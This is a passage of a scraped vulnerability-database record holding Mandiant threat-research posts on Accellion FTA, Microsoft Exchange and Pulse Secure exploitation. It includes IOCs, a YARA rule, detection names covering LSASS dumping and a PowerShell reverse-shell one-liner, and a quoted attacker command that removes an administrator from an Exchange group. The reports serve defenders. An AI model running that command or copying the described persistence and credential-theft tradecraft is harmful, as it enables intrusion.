appeared on the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA device had been recently targeted.\n\n#### Key Overlaps With FIN11\n\n_UNC2582 (Extortion) and FIN11_\n\nMandiant identified overlaps between UNC2582\u2019s data theft extortion activity and prior [FIN11](<https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html>) operations, including common email senders and the use of the CL0P^_- LEAKS shaming site. While FIN11 is known for deploying CLOP ransomware, we have previously observed the group conduct data theft extortion without ransomware deployment, similar to these cases.\n\n * Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last campaigns that were clearly attributable to the group.\n * We have not observed FIN11 phishing activity in the new year. FIN11 has typically paused their phishing operations over the winter holidays and had several extended gaps in their operations. However, the timing of this current hiatus is also consistent with UNC2582\u2019s data theft extortion activity.\n * UNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation page. The linked websites were the same ones used to support historical CLOP operations, a series of ransomware and data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\n\n_UNC2546 (FTA Exploitation and DEWMODE) and FIN11_\n\nThere are also limited overlaps between FIN11 and UNC2546.\n\n * Many of the organizations compromised by UNC2546 were previously targeted by FIN11.\n * An IP address that communicated with a DEWMODE web shell was in the \"Fortunix Networks L.P.\" netblock, a network frequently used by FIN11 to host download and FRIENDSPEAK command and control (C2) domains.\n\n#### Implications\n\nThe overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters separately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the overlaps with FIN11 is limited to the later stages of the attack life cycle. UNC2546 uses a different infection vector and foothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks. We therefore have insufficient evidence to attribute the FTA exploitation, DEWMODE, or data theft extortion activity to FIN11. Using SQL injection to deploy DEWMODE or acquiring access to a DEWMODE shell from a separate threat actor would represent a significant shift in FIN11 TTPs, given the group has traditionally relied on phishing campaigns as its initial infection vector and we have not previously observed them use zero-day vulnerabilities. \n\n#### Acknowledgements\n\nDavid Wong, Brandon Walters, Stephen Eckels and Jon Erickson\n\n#### Indicators of Compromise (IOCs)\n\n_DEWMODE Web Shells_\n\n**MD5**\n\n| \n\n**SHA256** \n \n---|--- \n \n2798c0e836b907e8224520e7e6e4bb42\n\n| \n\n5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b \n \nbdfd11b1b092b7c61ce5f02ffc5ad55a\n\n| \n\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7 \n \n_UNC2546 Source IP Addresses_\n\nThe following source IP addresses were observed in multiple UNC2546 intrusions:\n\n * 45.135.229.179\n * 79.141.162.82\n * 155.94.160.40\n * 192.154.253.120\n * 192.52.167.101\n * 194.88.104.24\n\n#### Detections\n\n_FireEye Detections_\n\n * FE_Webshell_PHP_DEWMODE_1\n * FEC_Webshell_PHP_DEWMODE_1\n * Webshell.PHP.DEWMODE\n\n_Mandiant Security Validation_\n\n * A101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1\n * A101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2\n\n_DEWMODE YARA Rule_\n\nThe following YARA rule is not intended to be used on production systems or to inform blocking rules without first being validated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of false positives. This rule is intended to serve as a starting point for hunting efforts to identify DEWMODE payloads; however, it may need adjustment over time if the malware family changes.\n\nrule DEWMODE_PHP_Webshell \n{ \nstrings: \n$s1 = /if \\\\(isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]dwn[\\x22\\x27]]\\\\)[\\x09\\x20]{0,32}&&[\\x09\\x20]{0,32}isset\\\\(\\$_REQUEST\\\\[[\\x22\\x27]fn[\\x22\\x27]\\\\]\\\\)\\\\)\\s{0,256}\\\\{/ \n$s2 = \"<th>file_id</th>\" \n$s3 = \"<th>path</th>\" \n$s4 = \"<th>file_name</th>\" \n$s5 = \"<th>uploaded_by</th>\" \n$s6 = \"target=\\\\\\\\\\\"_blank\\\\\\\\\\\">Download</a></td>\" \n$s7 = \"Content-Type: application/octet-stream\" \n$s8 = \"Content-disposition: attachment; filename=\" \ncondition: \nall of them \n} \n---\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T00:00:00", "type": "fireeye", "title": "Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-22T00:00:00", "id": "FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "href": "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \n**CVE-2021-26855**\n\n| \n\nCritical\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004941>) \n \n**CVE-2021-26857**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004938>) \n \n**CVE-2021-26858**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004944>) \n \n**CVE-2021-27065**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004939>) \n \nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. [Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, they have identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with others in the information security industry, indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistent mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Note** \n \n---|---|--- \n \n165.232.154.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/02 02:43 \n \n182.18.152.105\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 16:16 \n \n##### UNC2640\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5** \n \n---|---|--- \n \nhelp.aspx\n\n| \n\nFile: Web shell\n\n| \n\n4b3039cf227c611c45d2242d1228a121 \n \niisstart.aspx\n\n| \n\nFile: Web shell\n\n| \n\n0fd9bffa49c76ee12e51e3b8ae0609ac \n \n##### UNC2643\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5/Note** \n \n---|---|--- \n \nCobalt Strike BEACON\n\n| \n\nFile: Shellcode\n\n| \n\n79eb217578bed4c250803bd573b10151 \n \n89.34.111.11\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:06 \n \n86.105.18.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:39 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| \n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. \n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-29T03:23:15", "description": "On April 20, 2021, Mandiant published detailed results of our investigations into compromised Pulse Secure devices by suspected Chinese espionage operators. This blog post is intended to provide an update on our findings, give additional recommendations to network defenders, and discuss potential implications for U.S.-China strategic relations.\n\n * Mandiant continues to gather evidence and respond to intrusions involving compromises of Pulse Secure VPN appliances at organizations across the defense, government, high tech, transportation, and financial sectors in the U.S. and Europe (Figure 1).\n * Reverse engineers on the FLARE team have identified four additional code families specifically designed to manipulate Pulse Secure devices. \n * We now assess that espionage activity by UNC2630 and UNC2717 supports key Chinese government priorities. Many compromised organizations operate in verticals and industries aligned with Beijing\u2019s strategic objectives outlined in China\u2019s recent 14th Five Year Plan.\n * While there is evidence of data theft at many organizations, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi [agreement](<https://obamawhitehouse.archives.gov/the-press-office/2015/09/25/fact-sheet-president-xi-jinpings-state-visit-united-states>).\n * Mandiant Threat Intelligence assesses that Chinese cyber espionage activity has demonstrated a higher tolerance for risk and is less constrained by diplomatic pressures than previously characterized.\nFigure 1: Organizations with compromised Pulse Secure devices by vertical and geographic location\n\nPulse Secure continues to work closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues. Pulse Secure\u2019s parent company, Ivanti, has released patches to proactively address software vulnerabilities and issued updated [Security Advisories](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) and [Knowledge Articles](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to assist customers. (Please see the Forensics, Remediation, and Hardening Guidelines section for additional details.)\n\n#### UNC2630 and UNC2717 Tradecraft and Response to Disclosure\n\nMandiant is tracking 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyber espionage groups which we believe are affiliated with the Chinese government. Between April 17 and April 20, 2021, Mandiant incident responders observed UNC2630 access dozens of compromised devices and remove webshells like ATRIUM and SLIGHTPULSE.\n\n * Under certain conditions, the Integrity Checker Tool (ICT) will show no evidence of compromise on appliances which may have had historical compromise. This false negative may be returned because the ICT cannot scan the rollback partition. If a backdoor or persistence patcher exists on the rollback partition and a Pulse Secure appliance is rolled back to the prior version, the backdoor(s) will be present on the appliance. Please see the Forensics, Remediation, and Hardening Guidelines section for important information regarding the ICT and upgrade process.\n * In at least one instance, UNC2630 deleted their webshell(s) but did not remove the persistence patcher, making it possible to regain access when the device was upgraded. The remaining persistence patcher causes the malicious code to be executed later during a system upgrade, re-inserts webshell logic into various files on the appliance, and recompromises the device.\n * It is unusual for Chinese espionage actors to remove a large number of backdoors across several victim environments on or around the time of public disclosure. This action displays an interesting concern for operational security and a sensitivity to publicity.\n\nBoth UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration. They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\n\n#### Updates from Incident Response Investigations\n\nWe continue to suspect that multiple groups including UNC2630 and UNC2717 are responsible for this activity, despite the use of similar exploits and tools. There is a high degree of variation in attacker actions within victim environments, with actors inconsistently using a combination of tools and command and control IP addresses.\n\nReverse engineers on the FLARE team have identified four additional malware families specifically designed to manipulate Pulse Secure devices (Table 1). These utilities have similar functions to the 12 previously documented malware families: harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence. Please see the Technical Annex for detailed analysis of these code families.\n\n**Malware Family**\n\n| \n\n**Description**\n\n| \n\n**Actor** \n \n---|---|--- \n \nBLOODMINE\n\n| \n\nBLOODMINE is a utility for parsing Pulse Secure Connect log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file.\n\n| \n\nUNC2630 \n \nBLOODBANK\n\n| \n\nBLOODBANK is a credential theft utility that parses two files containing password hashes or plaintext passwords and expects an output file to be given at the command prompt.\n\n| \n\nUNC2630 \n \nCLEANPULSE\n\n| \n\nCLEANPULSE is a memory patching utility that may be used to prevent certain log events from occurring. It was found in close proximity to an ATRIUM webshell.\n\n| \n\nUNC2630 \n \nRAPIDPULSE\n\n| \n\nRAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file. RAPIDPULSE can serve as an encrypted file downloader for the attacker.\n\n| \n\nUNC2630 \n \nTable 1: New malware families identified\n\n_Initial Compromise_\n\nThe actors leveraged several vulnerabilities in Pulse Secure VPN appliances. Mandiant observed the use of the recently patched vulnerability CVE-2021-22893 to compromise fully patched Pulse Secure appliances as well as previously disclosed vulnerabilities from 2019 and 2020. In many cases, determining the initial exploitation vector and timeframe was not possible to determine because the actors altered or deleted forensic evidence, or the appliance had undergone subsequent code upgrades thereby destroying evidence related to the initial exploitation.\n\n_Establish Foothold_\n\nIn some cases, Mandiant observed the actors create their own Local Administrator account outside of established credential management controls on Windows servers of strategic value. This allowed the actor to maintain access to systems with short-cycle credential rotation policies and provided a sufficient level of access to operate freely within their target environment. The actors also maintained their foothold into the targeted environments exclusively through Pulse Secure webshells and malware without relying on backdoors deployed on internal Windows or Linux endpoints.\n\n_Escalate Privileges_\n\nMandiant observed the actors use three credential harvesting techniques on Windows systems:\n\n * Targeting of clear text passwords and hashes from memory using the credential harvesting tool Mimikatz. Instead of being copied locally and executed on the target system, Mandiant saw evidence of the Mimikatz binary on the source system of an RDP session (i.e. the threat actor\u2019s system that was connected to the VPN) through an RDP mapped drive.\n * Copying and exfiltration of the SAM, SECURITY, and SYSTEM registry hives which contained cached NTLM hashes for Local and Domain accounts.\n * Leveraging the Windows Task Manager process to target the Local Security Authority Subsystem Service (LSASS) process memory for NTLM hashes.\n\nIn addition to these privilege escalation techniques, the actors specifically targeted separate privileged accounts belonging to individuals whose unprivileged accounts were previously compromised (likely through the Pulse Secure credential harvesting malware families). It is unclear how the account associations were made by the actor.\n\n_Internal Reconnaissance_\n\nMandiant found evidence that the actors renamed their own workstations that they connected to the VPN of victim networks to mimic the naming convention of their target environment. This practice aligns with the actor\u2019s objective for long-term persistence and evading detection and demonstrates a familiarity with the internal hostnames in the victim environment.\n\nThe actors operated solely by utilizing Windows-based utilities to carry out tasks. Some of the utilities observed were net.exe, quser.exe, powershell.exe, powershell_ise.exe, findstr.exe, netstat.exe, cmd.exe, reg.exe and tasklist.exe.\n\n_Move Laterally_\n\nMost lateral movement originated from compromised Pulse Secure VPN appliances to internal systems within the environment. While connected to the Pulse VPN appliance, the actor\u2019s system was assigned an IP address from the Pulse VPN DHCP pool and they moved laterally throughout the environments by leveraging the Remote Desktop Protocol (RDP), the Secure Shell Protocol (SSH), and browser-based communication to HTTPS hosted resources. The actors also accessed other resources such as Microsoft M365 cloud environments using stolen credentials they had previously acquired.\n\nMandiant also observed the actors targeting ESXi host servers. The actor enabled SSH on ESXi hosts that were previously disabled via the web interface. When their operations on the system were finished, the actors disabled SSH on the ESXi host again and cleared or preemptively disabled all relevant logging associated with the performed activities. This includes authentication, command history, and message logging on the system.\n\n_Maintain Presence_\n\nMandiant observed the threat actor maintain persistence by compromising the upgrade process on the Pulse Secure Appliance. Persistence was primarily achieved by modifying the legitimate DSUpgrade.pm file to install the ATRIUM webshell across each upgrade performed by an administrator. The actor likely chose DSUpgade.pm to host their patch logic as it is a core file in the system upgrade procedure, ensuring the patch is applied during updates. The patcher modifies content in /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a persistence mechanism which allows the actor to maintain access to the system across updates.\n\nThe actors also achieved persistence in other cases by prepending a bash script to the file /bin/umount normally used to unmount a Linux filesystem. This binary was targeted by the actor because it is executed by the Pulse Secure appliance during a system upgrade. The actor\u2019s script verifies that the umount binary executes with a specific set of arguments, which are identical to the arguments used by the Pulse Secure appliance to executes the binary. The inserted malicious bash script remounts the filesystem as read-write and iterates through a series of bash routines to inject the ATRIUM webshell, hide SLOWPULSE from a legacy file integrity bash script, remove or add itself from the umount file, and validate the web process was running after a reboot to return the filesystem back to read-only.\n\n_Complete Mission_\n\nThe threat actor\u2019s objectives appear to be stealing credentials, maintaining long-term persistent access to victim networks, and accessing or exfiltrating sensitive data. Mandiant has observed the attackers:\n\n * Staging data related to sensitive projects, often in C:\\Users\\Public\n * Naming exfiltration archives to resemble Windows Updates (KB) or to match the format KB<digits>.zip\n * Using the JAR/ZIP file format for data exfiltration\n * Deleting exfiltrated archives\n\nAnalysis of new malware families is included in the Technical Annex to enable defenders to quickly assess if their respective appliances have been affected. Relevant MITRE ATT&CK techniques, Yara rules and hashes are published on [Mandiant\u2019s GitHub page](<https://github.com/mandiant/pulsesecure_exploitation_countermeasures>).\n\n#### Forensics, Remediation, and Hardening Guidelines\n\nTo begin an investigation, Pulse Secure users should contact their Customer Support Representative for assistance completing the following steps:\n\n 1. Capture memory and a forensic image of the appliance\n 2. Run the Pulse Integrity Checker Tool found online\n 3. Request a decrypted image of each partition and a memory dump\n\nTo remediate a compromised Pulse Secure appliance: \n\n 1. Caution must be taken when determining if a Pulse Secure device was compromised at any previous date. If the Integrity Checker Tool (ICT) was not run before the appliance was updated, the only evidence of compromise will exist in the system rollback partition which cannot be scanned by the ICT. If an upgrade was performed without first using the ICT, a manual inspection of the rollback partition is required to determine if the device was previously compromised.\n 2. To ensure that no malicious logic is copied to a clean device, users must perform upgrades from the appliance console rather than the web interface. The console upgrade process follows a separate code path that will not execute files such as DSUpgrade.pm.\n 3. Previous versions of the ICT will exit if run on an unsupported software version. For every ICT scan, ensure that the ICT would have supported the device's version number.\n 4. Reset all passwords in the environment.\n 5. Upgrade to the most recent software version.\n\nTo secure the appliance and assist with future investigations, consider implementing the following:\n\n 1. Enable unauthenticated logging and configure syslog for Events, User & Admin Access\n 2. Forward all logs to a central log repository\n 3. Review logs for unusual authentications and evidence of exploitation\n 4. Regularly run the Integrity Checker Tool\n 5. Apply patches as soon as they are made available\n\n#### Geopolitical Context and Implications for U.S.-China Relations\n\nIn collaboration with intelligence analysts at BAE Systems Applied Intelligence, Mandiant has identified dozens of organizations across the defense, government, telecommunications, high tech, education, transportation, and financial sectors in the U.S. and Europe that have been compromised via vulnerabilities in Pulse Secure VPNs. Historic Mandiant and BAE investigations identified a significant number of these organizations as previous APT5 targets.\n\nNotably, compromised organizations operate in verticals and industries aligned with Beijing\u2019s strategic objectives as outlined in China\u2019s 14th Five Year Plan. Many manufacturers also compete with Chinese businesses in the high tech, green energy, and telecommunications sectors. Despite this, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi agreement.\n\nTargets of Chinese cyber espionage operations are often selected for their alignment with national strategic goals, and there is a strong correlation between pillar industries listed in policy white papers and targets of Chinese cyber espionage activity.\n\nChina has outlined eight key areas of vital economic interest for development and production which it views as essential to maintaining global competitiveness, under the following categories: energy, healthcare, railway transportation, telecommunications, national defense and stability, advanced manufacturing, network power, and sports and culture.\n\n_Historical Context_\n\nIn the [_Red Line Drawn_](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-china-espionage.pdf>)_ _report, Mandiant documented a significant decline in the volume of Chinese cyberespionage activity in 2014 and assessed that the restructuring of China's military and civilian intelligence agencies significantly impacted Chinese cyber operations. Then, in September 2015, President Xi of China concluded a bilateral agreement with U.S. President Obama to prohibit state-sponsored theft of intellectual property for the purpose of providing commercial advantage. Commercial IP theft has historically been a prominent characteristic of Chinese cyber espionage activity.\n\nIn 2018 we conducted an extensive [review](<https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-executive-s05-redline-redrawn.pdf>) of Chinese cyber espionage operations, both before and after the official announcement of the PLA reforms and bilateral agreement to determine if there were any corresponding changes in the tactics, techniques, and procedures (TTPs) used during Chinese cyberespionage operations. We observed two important changes in the type of information stolen and the geographic distribution of the targets.\n\n * Despite examining hundreds of incidents from January 2016 through mid 2019, we did not find definitive evidence of purely commercial application intellectual property theft in the US. Recent [indictments](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>) by the US Department of Justice suggest that this theft did occur. While we observed other malicious activity, including geopolitical targeting, theft of intellectual property with military applications, and theft of confidential business information, we did not find evidence that these cyber operations violated the Obama-Xi agreement.\n * Between January 2016 and mid-2019, the geographic focus of Chinese cyber operations shifted dramatically to Asia and away from the 